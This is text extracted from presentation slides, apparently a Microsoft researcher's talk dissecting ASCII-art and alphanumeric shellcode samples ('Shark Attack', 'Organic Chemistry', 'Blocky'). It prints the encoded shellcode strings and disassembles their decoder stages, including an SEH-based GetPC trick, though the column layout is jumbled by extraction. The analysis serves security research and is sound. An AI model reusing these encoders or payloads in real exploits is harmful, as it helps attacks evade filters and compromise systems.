.osADPFK,'MDi ',EHY BCb KNA lDMi`HBHi FPH !Dl lKi,ui:,*FECi:EB!
MH
FO
,sKILELCEADM,'NAbdPL* *YHbDMH:'JIL 7ELk iBM: l! 'A:+'+D; `''+1MNAi
DC
ML
,sJJFFPKY**"""'` 'LFHGBDiu,'**LPH';KMHb ?FLi ?EFi,
`
`'OK:
NP
PN
sAKNPPNA'`.*.wdJFb,'YLi `YT" ,uIA",iCHGAm,'+?+ `'+Lli
`'Y:,
DM
GG
YJIFAFEKNFFPPNAIFM!i`YA" .,:HE"',iPIJJFCFCmo,
IN
HM
"TCEDEK**"'`.LMGE? ',o?*'`` ```""**YHPBABKkm,
LK
LF
"*:HFEFCFC!"` '
``"*YFCFEk,
FC
FC
ii!
'*YFGk,
FC
PP
Y'
"Y7
FG
OE
IL
EG
PM
OLNJAAPANRRQOCOVFHZKDXCGHKURQZ[Shark Ascii Art Shellcode by SkyLined]LRWVASXHHPSSVHBHADPAYUOSPJKBN
Peter Ferrie, Microsoft Corporation
42
Shark Attack
First stage
IMUL 10
33
56
54
58
33
56
58
48
34
34
50
33
6A
58
30
l1: 46
6B
32
30
75
39
C9
XOR
ECX, ECX
PUSH
ESI
PUSH
ESP
POP
EAX
30
XOR
ESI, DWORD PTR DS:[EAX]
PUSH
ESI
POP
EAX
DEC
EAX
72
XOR
AL, 72
50
XOR
AL, 50
PUSH
EAX
34 74
XOR
ESI, DWORD PTR SS:[ESI*2
41
PUSH
+41
POP
EAX
44 71 62
XOR
BYTE PTR DS:[ESI*2 + ECX
INC
ESI
44 71 6A 51 IMUL
EAX, DWORD PTR DS:[ESI*2
44 71 6B
XOR
AL, BYTE PTR DS:[ESI*2 +
44 31 48
XOR
BYTE PTR DS:[ESI + ECX +
[JNE
l1]
59
[encoded F0]
Peter Ferrie, Microsoft Corporation
+ ESP]
+ 62], AL
+ ECX + 6A], +51
ECX + 6B]
48], AL
43
Shark Attack
Second stage
IMUL 10
8D
8D
l1: AC
2C
3C
73
6B
l2: AC
2C
3C
73
02
AA
75
71 62
79 43
41
10
F9
C8 10
41
10
F9
C1
EA
Peter Ferrie, Microsoft Corporation
LEA
LEA
LODS
SUB
CMP
JNB
IMUL
LODS
SUB
CMP
JNB
ADD
STOS
JNE
ESI, DWORD PTR [ECX + 62]
EDI, DWORD PTR [ECX + 43]
BYTE PTR DS:[ESI]
AL, 41
AL, 10
l1
ECX, EAX, +10
BYTE PTR DS:[ESI]
AL, 41
AL, 10
l2
AL, CL
BYTE PTR ES:[EDI]
l1
44
ASCII Art
Organic
TX
``` .èÿÿÿÿñë.
` .dP*'
"Hh
dQ7
```` `8ë '
.GH' ``'````` AU ``
.,saaë,.
` ,ME: `''``` ` .ëO `
...
,,a3ÿ3þjAXHò®WWë
`` AYL `'.` ,a±H¶P© ,sƒñGTXu `
dKK*"'``
```"*6FCë, `
` :ñwš .', †î¶PKTX² dC²`
*6ò
`
aKF²
':ñwÉë
` GÁÉD, '., TX2ñ†7u dt' `''' 'Nh
7L,
` .éÂþÿÿ,
'@MMD `
`' :GJLh .,. "HEI" .O' `'''`` 1Mi `
`7P,..,dHEIJPD;`..` HEIJ!`
`'` ODFC, .,..
. dH ..'''''` EJ, ` `
`'"7HPHJF7*' `.` .JLJ7 `
`` :HNPLh .',.'`` OJ ````.'' :Mi `'`
`
,JCJ*
`` 7HKGCh `,"''` MJN,. ``'..` 'MP `''```
``````````
,iHE*
`' "ALEKP. ` .NN !EBOGGh `,,, `JJ .'` `
``````` oEF"'
`''` `MMMNKh 1NJH 1IIIMMN ,,. 'KA ` .sNs. .sEBs, `
.OC"
``'.' `JHEADh 1AM' 1FFLOK "'" ¦O! LO"'7K,dO" 'KI .siKOK7'
'. 7IHCI, BB! ,.`""' d, iF E P:` .H!OMDCM7` dI"' i7
`
.dKPb, ., JGKAA 1Ki ''` ., dIA !D7!G Ki d7 7K, :I,dJ'
P: ```
` .HEKCMDH, ,, lEKDO 'CI !HP'`' 'MC iC iH EL EN'. "PP7' MD, iC!``````
,MMAAGGL7 .,.`IHEM `LE`iG ,PM. A7 K7.Fl "`dD" "!.. .`,`*7ML71,
`
.ION7Ý**" ..", FCP7 !MDiI, 7OI,K!i7 AI! ,MF' `'`'"`"..`,. .sKLi:,,
NL7
`'..`.ODI' iKB"FHE' 7LE7,N'i*" .LPMDCPAEIM,
`., iDIGHELEODs,
:PM ` ` ``'.'` :DC7 !PM . ND: 'E7,i7 .GG77**"""*KKAFEKIJ, ` "OMEAIFD"'*IK,
`EL ```'''```` KB7 dF! ' dC d7 iA.AC"`.; dPF, ,. "CAACPGK, '****" .
Eh
7H; ``''````` iP7 dNI` .dJ .P7 iE7"
;i dMDJJ ".'
"GHKPKL,
. .,.` "h
`FC, ````` .iK: `
,KA" ACP l7` .," HK 'DPI7 .'''`
"LAHGGK, '"''`'` N!
*KN,. .,HC*` `.dIDN" iL7 "` `,," 7M, .LF` ````````
"EDJLIAO,, ` .PO
`"7FE*'`
`` "FE' .KI; .Kic ... *LK7"
`
``
`"NKNKNKLKNK`
``.NK; JKNAAl````
''"""''
`` KJ* `'BLHELl`````
:JA` ` "DBE7````
!Ch, `` lG7 `
"lPs..sP' `
`"**'`
Peter Ferrie, Microsoft Corporation
45
Organic Chemistry
Single-stage
IMUL 10-equiv.
54
58
20 20
20 20
20 20
20 20
60
60
60
20 20
2E E8 FF FF FF [FF]
l01: FF F1
EB 2E
...
l02: 20 60 60
60
60
20 60 38
EB 20
...
l03: 20 20
20 20
20 20
20 20
20 20
20 20
20 20
Peter Ferrie, Microsoft Corporation
PUSH
POP
AND
AND
AND
AND
PUSHAD
PUSHAD
PUSHAD
AND
CALL NEAR
PUSH
JMP SHORT
ESP
EAX
BYTE
BYTE
BYTE
BYTE
PTR
PTR
PTR
PTR
DS:[EAX],
DS:[EAX],
DS:[EAX],
DS:[EAX],
AH
AH
AH
AH
BYTE PTR DS:[EAX], AH
l01
ECX
l02
AND
BYTE PTR DS:[EAX + 60], AH
PUSHAD
PUSHAD
AND
BYTE PTR DS:[EAX + 38], AH
JMP SHORT l03
AND
AND
AND
AND
AND
AND
AND
BYTE
BYTE
BYTE
BYTE
BYTE
BYTE
BYTE
PTR
PTR
PTR
PTR
PTR
PTR
PTR
DS:[EAX],
DS:[EAX],
DS:[EAX],
DS:[EAX],
DS:[EAX],
DS:[EAX],
DS:[EAX],
AH
AH
AH
AH
AH
AH
AH
46
Organic Chemistry
Single-stage
IMUL 10-equiv. (cont.)
20 20
20 20
20 20
20 20
20 20
20 20
20 20
20 20
2E 2C 73
61
61
EB 2C
...
l04: EB 4F
...
l05: 20 20
20 20
20 20
20 20
20 20
20 20
20 20
2C 2C
61
33 FF
33 FE
6A 41
Peter Ferrie, Microsoft Corporation
AND
AND
AND
AND
AND
AND
AND
AND
SUB
POPAD
POPAD
JMP SHORT
JMP
AND
AND
AND
AND
AND
AND
AND
SUB
POPAD
XOR
XOR
PUSH
BYTE PTR
BYTE PTR
BYTE PTR
BYTE PTR
BYTE PTR
BYTE PTR
BYTE PTR
BYTE PTR
AL, 73
DS:[EAX],
DS:[EAX],
DS:[EAX],
DS:[EAX],
DS:[EAX],
DS:[EAX],
DS:[EAX],
DS:[EAX],
AH
AH
AH
AH
AH
AH
AH
AH
DS:[EAX],
DS:[EAX],
DS:[EAX],
DS:[EAX],
DS:[EAX],
DS:[EAX],
DS:[EAX],
AH
AH
AH
AH
AH
AH
AH
l05
SHORT l07
BYTE PTR
BYTE PTR
BYTE PTR
BYTE PTR
BYTE PTR
BYTE PTR
BYTE PTR
AL, 2C
EDI, EDI
EDI, ESI
+41
47
Organic Chemistry
Single-stage
IMUL 10-equiv. (cont.)
l06:
l07:
l08:
l09:
58
48
F2 AE
57
57
EB 20
...
61
B1 48
B6 50
A9 20 20 2C 73
83 F1 47
54
58
75 20
...
2A 36
46
43
EB 2C
...
3A F1
77 9A
20 20
2E 27
2C 20
86 EE
Peter Ferrie, Microsoft Corporation
POP
DEC
REPNE SCAS
PUSH
PUSH
JMP SHORT
EAX
EAX
BYTE PTR ES:[EDI]
EDI
EDI
l06
POPAD
MOV
MOV
TEST
XOR
PUSH
POP
JNE
CL, 48
DH, 50
EAX, 732C2020
ECX, +47
ESP
EAX
l08
SUB
INC
INC
JMP
CMP
JNBE
AND
DAA
SUB
XCHG
DH, BYTE PTR DS:[ESI]
ESI
EBX
SHORT l09
DH, CL
l07
BYTE PTR DS:[EAX], AH
AL, 20
DH, CH
48
Organic Chemistry
Single-stage
IMUL 10-equiv. (cont.)
l10: B6
4B
54
58
B2
64
B2
20
20
2A
F2
20
20
60
20
20
20
20
61
4B
46
B2
20
20
20
20
20
50
20
43
60
20
20
36
20 20
20
20
20
20
20
20
20
20
20
20
20
20
Peter Ferrie, Microsoft Corporation
MOV
DEC
PUSH
POP
MOV
INC
MOV
AND
AND
SUB
AND
AND
AND
PUSHAD
AND
AND
AND
AND
POPAD
DEC
INC
MOV
AND
AND
AND
AND
AND
DH, 50
EBX
ESP
EAX
DL, 20
EBX
DL, 60
BYTE PTR
BYTE PTR
DH, BYTE
BYTE PTR
BYTE PTR
BYTE PTR
DS:[EAX], AH
DS:[EAX], AH
PTR DS:[ESI]
DS:[EAX], AH
DS:[EAX], AH
DS:[EAX], AH
BYTE
BYTE
BYTE
BYTE
PTR
PTR
PTR
PTR
DS:[EAX],
DS:[EAX],
DS:[EAX],
DS:[EAX],
AH
AH
AH
AH
EBX
ESI
DL, 20
BYTE PTR
BYTE PTR
BYTE PTR
BYTE PTR
BYTE PTR
DS:[EAX],
DS:[EAX],
DS:[EAX],
DS:[EAX],
DS:[EAX],
AH
AH
AH
AH
AH
49
Organic Chemistry
Single-stage
IMUL 10-equiv. (cont.)
20 20
27
3A F1
77 C9
EB 09
...
l11: 20 20
47
C1 C9
2C 20
27
2E 2C
54
58
32 F1
86 37
75 20
64 74
...
l12: 20 60
2E E9
l13: ...
AND
DAA
CMP
JNBE
JMP SHORT
BYTE PTR DS:[EAX], AH
BYTE PTR DS:[EAX], AH
EDI
ECX, 44
AL, 20
27
AND
INC
ROR
SUB
DAA
SUB
PUSH
POP
XOR
XCHG
JNE
JE
20
C2 FE FF FF
AND
JMP
44
20
Peter Ferrie, Microsoft Corporation
DH, CL
l09
l11
AL, 20
ESP
EAX
DH, CL
BYTE PTR DS:[EDI], DH
l12
l13
NEAR
BYTE PTR DS:[EAX + 20], AH
l04
50
Organic Chemistry
Single-stage
IMUL 10-equiv. (cont.)
20 20
27
3A F1
77 C9
EB 09
...
l11: 20 20
47
C1 C9
2C 20
27
2E 2C
54
58
32 F1
86 37
75 20
64 74
...
l12: 20 60
2E E9
l13: ...
AND
DAA
CMP
JNBE
JMP SHORT
BYTE PTR DS:[EAX], AH
BYTE PTR DS:[EAX], AH
EDI
ECX, 44
AL, 20
27
AND
INC
ROR
SUB
DAA
SUB
PUSH
POP
XOR
XCHG
JNE
JE
20
C2 FE FF FF
AND
JMP
44
20
Peter Ferrie, Microsoft Corporation
DH, CL
l09
l11
AL, 20
ESP
EAX
DH, CL
BYTE PTR DS:[EDI], DH
l12
l13
NEAR
BYTE PTR DS:[EAX + 20], AH
l04
51
ASCII Art
Julia
AAAAAAQ^j@X(F%(F)(F+(F9(F?(FV,@P_Pj_X"FW<@rQ<[tPwK$/2D9W0D9WGFu"^kDqWP2DqX2D1Wh
,[0D1WFOOu$CCLIFDHKGAC@HKGF@LHKGFALJMHKFH@HFJFDFHB@DAFCFMFHEI!!;:]:::::::];*MC
]FBC@HKODKE@BBKNAIIFFKJCCCBEBFHGGGCCBEOBKNAMFHKOLOCJJDA*:::;;+':::EAD;A;EA:E;]
'G]EAEGHMGNNJK@HACLMCGE@FIEOOEGOLIEEGF@HKEMCLHKELAM:--:^::::;GH@CMMHKDKB@@CLM]
]CCOOIIDGHKCDKI@COEJLCDGABJM@CLGAGEOGCJEDBDAL!::-=,/:/::/,GENJHKDKBD@CLM@OKG]]
]CLGIHKDKAL@CLM@CBLKIIEEOJKEGFACKOGJ]:L';!:,-':/:-GE+:KDENJMOOM@J!MOOM@IEKH@BG
]]F@KCLFFIHE@EDJMEEOOM@HEL@GDOHII]E:B':/,-'/,-EBHMGL]BD'|C'D \|J]K]|]||LFDGOA@
]]]AJKJKEGEDEBEBEBEDEBEBEFEBOOEFNDHK]D:FOLNKMIGH[l]]l'i \ " ' " ' ',//,/i]]llI
]]lllllIIIUUUUUSSUSSSSSSSSSSSWSWSWWSSWSWSSSSIIl]l: 'I.'_,,,..`_`.`. ,_ '.i'.l
"**"'`+!!+;!T]lUUSSSSSSSSSSWSSWSMWWWWSWWWSIIl]lI*lb ,,sSSS .`.M .`.`*" .v]]lll
.'-'`:-:i++::]]lUUUSSUSUWSWSSSWMMWWWSWWSSII]lIl]s, .SSSSSSb `.W` ` . \]l]l]lI
_`-`_-,,usss::]]lIIUSSUSWSSWSWMWWWWWWWSSSI]lIl]l' ::.""**""`
,. , b\VllIIIl
SWSW\Yb\\Yb\\Y '"*:!]lIUUSUSWSMMMSWWWSSlI]llMSIP '`.,,/:/:/|| d:'b:Vb]]lIIIIll
`*U\"-.'\'__, . ..`'"?!]llISWSMMMMWWSSSl]l]USUI,iIll]ili:ll]]:IiIillIIIIIIllll
'S`- .sSSP`.`.M `. s':llISWMMMMWWSSII]]lSSUIll]l]]llllllllIISIISSIIlllIIllI
`._`SSSi`.`.W.`.,Y,.]l!ISMWSMMWSSSIIl]llIIIl]]llIUSUIISSSSISIIIlll?llIISS
V:`YSSS,` ` _,oil.':!lIIS*MSMMIMISMSSIIllIIUIIUIUSUSUIUIIIIIllUIUUSSSUU
:, , `,, :,\?!ll?.:'llIIISSIWIwWSIIWMSWSIIIllllllll]l'll]llIIUIUUSSSUSU
!,/,| ?i\7ll!l!!:.]lI!ISiSSSSSSSSWWMMMSMSwSSUSUSUSSUSSUSUSSIUSSuSSUISUI
]!l]!lllIIIIIIl]!.l!dIdS*SISSSiSSWSWwSWSsMWSWSSSuSSuUUiSuSSUSSSUUIUSUIU
]l!l]ll!IiII1:1!.l,SlYIoSSSsSSSSSWWWWWWWSWSW7SWSSSSSSSSSUUUUUUIUIUUIIUI
I]l]I]IIiII11;!:,lIIdIISSSSSSSSSWSWWMMMWWMMWWWWSSsSSSSSUUUUSSUUIIIUIIII
Peter Ferrie, Microsoft Corporation
52
Eyes Without A Face
First stage
IMUL 10
41
41
41
41
41
41
51
5E
6A
58
28
28
28
28
28
28
2C
50
5F
50
l1: 6A
58
22
3C
72
3C
74
40
46
46
46
46
46
46
40
25
29
2B
39
3F
56
5F
46 57
40
51
5B
50
Peter Ferrie, Microsoft Corporation
INC
INC
INC
INC
INC
INC
PUSH
POP
PUSH
POP
SUB
SUB
SUB
SUB
SUB
SUB
SUB
PUSH
POP
PUSH
PUSH
POP
AND
CMP
[JB
CMP
[JE
ECX
ECX
ECX
ECX
ECX
ECX
ECX
ESI
+40
EAX
BYTE PTR
BYTE PTR
BYTE PTR
BYTE PTR
BYTE PTR
BYTE PTR
AL, 40
EAX
EDI
EAX
+5F
EAX
AL, BYTE
AL, 40
l2]
AL, 5B
l3]
DS:[ESI
DS:[ESI
DS:[ESI
DS:[ESI
DS:[ESI
DS:[ESI
+
+
+
+
+
+
25],
29],
2B],
39],
3F],
56],
AL
AL
AL
AL
AL
AL
PTR DS:[ESI + 57]
53
Eyes Without A Face
First stage
IMUL 10 (cont.)
77 4B
[JNBE
24 2F
AND
32 44 39 57 XOR
30 44 39 57 XOR
47
INC
l2: 46
INC
75 22
[JNE
l3: ...
Peter Ferrie, Microsoft Corporation
l2]
AL, 2F
AL, BYTE PTR DS:[EDI + ECX + 57]
BYTE PTR DS:[EDI + ECX + 57], AL
EDI
ESI
l1]
54
Eyes Without A Face
Second stage
IMUL 10
5E
l1: 6B
32
32
68
5B
30
46
4F
4F
75
44
44
44
0D
71
71
31
0A
57 10
58
57
20 2C
44 31 57
E4
Peter Ferrie, Microsoft Corporation
POP
IMUL
XOR
XOR
PUSH
POP
XOR
INC
DEC
DEC
JNE
ESI
EAX, DWORD PTR DS:[ESI*2 + ECX + 57], +10
AL, BYTE PTR DS:[ESI*2 + ECX + 58]
AL, BYTE PTR DS:[ESI + ECX + 57]
2C200A0D
EBX
BYTE PTR DS:[ESI + ECX + 57], AL
ESI
EDI
EDI
l1
55
ASCII Art
Blocky
WTX638WYWX4H4Pd38V34L3w0V34034Lj034LQXH41VV34LT34LZ1dDh3dDhRQXH4d4XPhAAQBhYYYYfhXBZBBBBRJfRT14L34LWHHh
28HHXTX38d39GGGGV3717RQXH4A4a1dDb3dDbABCEFGHIJKMNOABCEFGHIJKMNOABCEFGHIJKMNOABCEFGHIJKMNOABCEFGHIJKABh
HH39VTX30VXH4r4PP34tjAX0DqbFkDqjQ2Dqk0D1Hu9YhTtYP6hyUpvsojbdTxAyCPDEMZTDLbprjhbXWISM3YfPmysvndkWTooNqT
DDMJGEIL7"""""""*Y""""YHBDAILHGAMILHG7"""""YBMKNILGIAIGKGEGICAEBGDGNGIFJNDGCDA7*"""7ILPELFACCLOBJJGGLK
DDDCFCG',dIHHHDDb,'CFb`PCLOBNGILPMPDK YKEB7 FB7"""7EBFBFHFBFHINHOOKLAIBDMNDHFA dGJ7 "YFPPFHPMJFFHGAILF
NDMILFM BNH , cIAY DNN ILELCAADMNDDPPb JJE dHI LDE LJADPFKMDEHBCKNADMHBHFPHDKF ECE sa BMHFOKILELCEADMN
APLHDMH JIL,""---, ELB MA7"""*"""7Y*"" 7DM NA7"---dY"""*Y*""*YDY*"""""*YCY*""* MLJ Y J*"""""*YFFPKLFHG
BDLPHKM "YHFLEFOb, KNP P',NA7 dKY dNP",PN AJ YFLb`.YIAb,dCHb,',dGALDMb,',dGGb,JIF ,',dAFEKNb,'FFPPNAI
FMAHEPI:-----,"JJF CFC ',IN7 dHM d CED EKL MGb EHP B ABK"'*LKL FHF .,EFC FCF*'"CFE F CFC - **Y FGFCPPF
GOEILEG dPM7 O LNJ AAPTCBC( VEJ T JOH JOH QLB """ B WDZ P QKS LZNGY**"` OGW W ONM Y `"**+uq,.'WPELAFG
VPJLWUR URH "" FYG POI .'FVb YVQ ',PLP GZJ """ "ODb' JXM E XTO COY - pqd ILD,.qOXQ 7 bpp - YKH FFKMSLB
EUSUKOX.'YWMFRRXY',CAY Di'ZQb YIEY"OWP BYOKJACSOKY" dYOS 'dVFB "YXVNQBY","YOUY"YBFb ,"YNFHOQY".WVKQJLV
PUZZLCMFbasouvnandansodGDbuan?---, CKL eanuxzvcumndbuasodbzasudbeasznvodSboezn1ozxvdLbneuoasobXLJYYBFU
VQDTSOVGXSPY7"""""""*Y""""7D dBW" JXO KU7"""""*"""YEGLJQQLQAKSGBDEMEQLEZHTB7*"""YKKMOPFMUWUXNFJSNPFXV
DRRQAIRQQMG',dTRUKCHb,'SYb`Q."YHXQZSY".IX YONQ7.CM7 CVYAXXNBXGLFHZAKJJFEDTGW dGZ7 IRMYHDUZXIAJXIYXYRMI
MIFQRSWKMJM QVQ', eSCY ZMR RZbaesuozsdFZXb TZH QXJ JJXZYDOSIJOLWJYIIMKVIXAVK NJH dMDTSKTOAHGWBWGIJNLIS
NHNTEDQNQSJ WFX,""---, XSM *""*YLY*"""""*Y EAA FHQ Y*"""""*YIY*"""""*YVY*""* FML Y*"""""*YMAECTMQWHUOY
YFWWCIECNFK "YXIXSEAb, HFF,dSIb,',dYPSBBb, KMH TZT ,dZQNONb,',dNCHOVb,',dMCb,UJP ,dNUSEJb,'KZOIXHNWBVS
GJJKBJSBMXM:-----,"KTM ORX"'*ZUW dHA'.,ZEU SGQ UKA VLO',`**Y OTZ',`PYM NYN*'"PLF MJZ .,PZK RFNIKQUBDHT
QTDWEVEOXGX dVL7 Y JWC TFR Z WIL ZZNMY**"' ZTA CGW OND CT+=- PYQ Z QFA RJC Q GTR CGPXY**"`.YIHIUTGYLFP
IQENEBPJILC NGC,"".FIS IKK C VMZ BKO,-,qqd TUK RVY YFR,'.qqd ENO,'.SAF GZT,.qHLE HQZ - qqd FWSFUKJCEFB
YJASYKFYRCB.'YJFTEXVY',BHY Q YGY,"YJDBBAY",UKMb'GWb`YCABKYY"."YDWYHIY"."YMUY"YCAb"YBIIYNY",IEXZKKUMPQD
PDHBLIWPDBMQbouaenoxzdzzxedBbxoasdenxzsasdoeuneuzas1moxcasedGbzxnmexadPbaeox1xauo1eusazxzdMQGIJYYGPQZZ
AUYYKTZCTAWMTGVCPAMQKGZZZIUASOMJGHRKNLDYLHZYSGDJVXETRKMNMJRUNVIOPGMZHBVXFTXWVCRQBBKJGCZPIYDFDSHGISXZAL
ANUEFFTCYBBZKFUZRIHQPHPYDZJHOWXKUMBNWXGHBCGHWHDYVONRGKECYYRBNTBKDLVNGQZAYMFPJVGZWXZCCJIGSNIJKRTNRZKVZX
XPBMUPTRCDXTGCPOSCTMUQYQOZKYENJPDLZSXUFEUJCNBBZFORBAUMFUGXFCBPQKIPHAJGITAHUNUOKFJAWSZCYASNQDNOBKJBZTUN
Peter Ferrie, Microsoft Corporation
56
Around The Block
First stage
SEH GetPC
57
54
58
36
57
59
57
58
34
34
64
56
33
33
56
33
33
6A
33
51
58
48
34
56
56
33
54
33 38
48
50
33 38
34 4C
77 30
34 30
34 4C
30
34 4C
31
34 4C
Peter Ferrie, Microsoft Corporation
PUSH
PUSH
POP
XOR
PUSH
POP
PUSH
POP
XOR
XOR
XOR
PUSH
XOR
XOR
PUSH
XOR
XOR
PUSH
XOR
PUSH
POP
DEC
XOR
PUSH
PUSH
XOR
PUSH
EDI
ESP
EAX
EDI, DWORD
EDI
ECX
EDI
EAX
AL, 48
AL, 50
EDI, DWORD
ESI
ESI, DWORD
ESI, DWORD
ESI
ESI, DWORD
ESI, DWORD
+30
ESI, DWORD
ECX
EAX
EAX
AL, 31
ESI
ESI
ESI, DWORD
ESP
PTR SS:[EAX]
PTR FS:[EAX]
PTR SS:[ECX*2 + ESP]
PTR DS:[EDI + 30]
PTR DS:[ESI + EAX]
PTR SS:[ECX*2 + ESP]
PTR SS:[ECX*2 + ESP]
PTR SS:[ECX*2 + ESP]
57
Around The Block
First stage
SEH GetPC (cont.)
31
33
52
51
58
48
34
34
50
68
68
66
5A
42
42
42
42
52
4A
66
54
31
33
33
5A
57
48
64 44 68
64 44 68
64
58
41 41 51 42
59 59 59 59
68 58 42
52
34 4C
34 4C
34 4C
Peter Ferrie, Microsoft Corporation
XOR
XOR
PUSH
PUSH
POP
DEC
XOR
XOR
PUSH
PUSH
PUSH
PUSH
POP
INC
INC
INC
INC
PUSH
DEC
PUSH
PUSH
XOR
XOR
XOR
POP
PUSH
DEC
DWORD PTR SS:[EAX*2 + ESP + 68], ESP
ESP, DWORD PTR SS:[EAX*2 + ESP + 68]
EDX
ECX
EAX
EAX
AL, 64
AL, 58
EAX
42514141
59595959
4258
EDX
EDX
EDX
EDX
EDX
EDX
EDX
DX
ESP
DWORD PTR SS:[ECX*2 + ESP], ESI
ESI, DWORD PTR SS:[ECX*2 + ESP]
ESI, DWORD PTR SS:[ECX*2 + ESP]
EDX
EDI
EAX
58
Around The Block
First stage
SEH GetPC (cont.)
48
68
48
48
58
54
58
33
64
47
47
47
47
56
33
31
52
51
58
48
34
34
31
33
41
42
43
0D 0A 32 38
38
33 39
37
37
41
61
64 44 62
64 44 62
Peter Ferrie, Microsoft Corporation
DEC
PUSH
DEC
DEC
POP
PUSH
POP
XOR
XOR
INC
INC
INC
INC
PUSH
XOR
XOR
PUSH
PUSH
POP
DEC
XOR
XOR
XOR
XOR
INC
INC
INC
EAX
38320A0D
EAX
EAX
EAX
ESP
EAX
EDI, DWORD PTR DS:[EAX]
EDI, DWORD PTR FS:[ECX]
EDI
EDI
EDI
EDI
ESI
ESI, DWORD PTR DS:[EDI]
DWORD PTR DS:[EDI], ESI
EDX
ECX
EAX
EAX
AL, 41
AL, 61
DWORD PTR SS:[EAX*2 + ESP + 62], ESP
ESP, DWORD PTR SS:[EAX*2 + ESP + 62]
ECX
EDX
EBX
59
Around The Block
First stage
SEH GetPC (cont.)
45
46
47
48
49
4A
4B
4D
4E
4F
41
42
43
45
46
47
48
49
4A
4B
4D
4E
4F
41
42
43
45
Peter Ferrie, Microsoft Corporation
INC
INC
INC
DEC
DEC
DEC
DEC
DEC
DEC
DEC
INC
INC
INC
INC
INC
INC
DEC
DEC
DEC
DEC
DEC
DEC
DEC
INC
INC
INC
INC
EBP
ESI
EDI
EAX
ECX
EDX
EBX
EBP
ESI
EDI
ECX
EDX
EBX
EBP
ESI
EDI
EAX
ECX
EDX
EBX
EBP
ESI
EDI
ECX
EDX
EBX
EBP
46
47
48
49
4A
4B
4D
4E
4F
41
42
43
45
46
47
48
49
4A
4B
4D
4E
4F
41
42
43
45
46
INC
INC
DEC
DEC
DEC
DEC
DEC
DEC
DEC
INC
INC
INC
INC
INC
INC
DEC
DEC
DEC
DEC
DEC
DEC
DEC
INC
INC
INC
INC
INC
ESI
EDI
EAX
ECX
EDX
EBX
EBP
ESI
EDI
ECX
EDX
EBX
EBP
ESI
EDI
EAX
ECX
EDX
EBX
EBP
ESI
EDI
ECX
EDX
EBX
EBP
ESI
60
Around The Block
First stage
SEH GetPC (cont.)
47
48
49
4A
4B
41
42
68 0D 0A 48 48
33 39
Peter Ferrie, Microsoft Corporation
INC
DEC
DEC
DEC
DEC
INC
INC
PUSH
XOR
EDI
EAX
ECX
EDX
EBX
ECX
EDX
48480A0D
EDI, DWORD PTR DS:[ECX]
61
Around The Block
First stage
SEH GetPC (simplified)
33
64
8B
83
57
57
64
B8
AB
B8
AB
66
AB
0F
C0
8B 78 30
7F 18
C7 1C
89 20
58 5C 59 8B
40 0C 40 40
B8 FF E0
0B
Peter Ferrie, Microsoft Corporation
XOR
MOV
MOV
ADD
PUSH
PUSH
MOV
MOV
STOS
MOV
STOS
MOV
STOS
UD2
EAX, EAX
EDI, DWORD PTR FS:[EAX + 30]
EDI, DWORD PTR DS:[EDI + 18]
EDI, +1C
EDI
EDI
DWORD PTR FS:[EAX], ESP
EAX, 8B595C58
DWORD PTR ES:[EDI]
EAX, 40400C40
DWORD PTR ES:[EDI]
AX, E0FF
DWORD PTR ES:[EDI]
62
Around The Block
Second stage
IMUL 10
56
54
58
33
56
58
48
34
34
50
33
6A
58
30
l1: 46
6B
32
30
75
PUSH
PUSH
POP
30
XOR
PUSH
POP
DEC
72
XOR
50
XOR
PUSH
34 74
XOR
41
PUSH
POP
44 71 62
XOR
INC
44 71 6A 51 IMUL
44 71 6B
XOR
44 31 48
XOR
39
[JNE
Peter Ferrie, Microsoft Corporation
ESI
ESP
EAX
ESI, DWORD PTR DS:[EAX]
ESI
EAX
EAX
AL, 72
AL, 50
EAX
ESI, DWORD PTR SS:[ESI*2
+41
EAX
BYTE PTR DS:[ESI*2 + ECX
ESI
EAX, DWORD PTR DS:[ESI*2
AL, BYTE PTR DS:[ESI*2 +
BYTE PTR DS:[ESI + ECX +
l1]
+ ESP]
+ 62], AL
+ ECX + 6A], +51
ECX + 6B]
48], AL
63
Thank you
Check me out: http://pferrie.tripod.com
Questions?
Peter Ferrie, Microsoft Corporation
64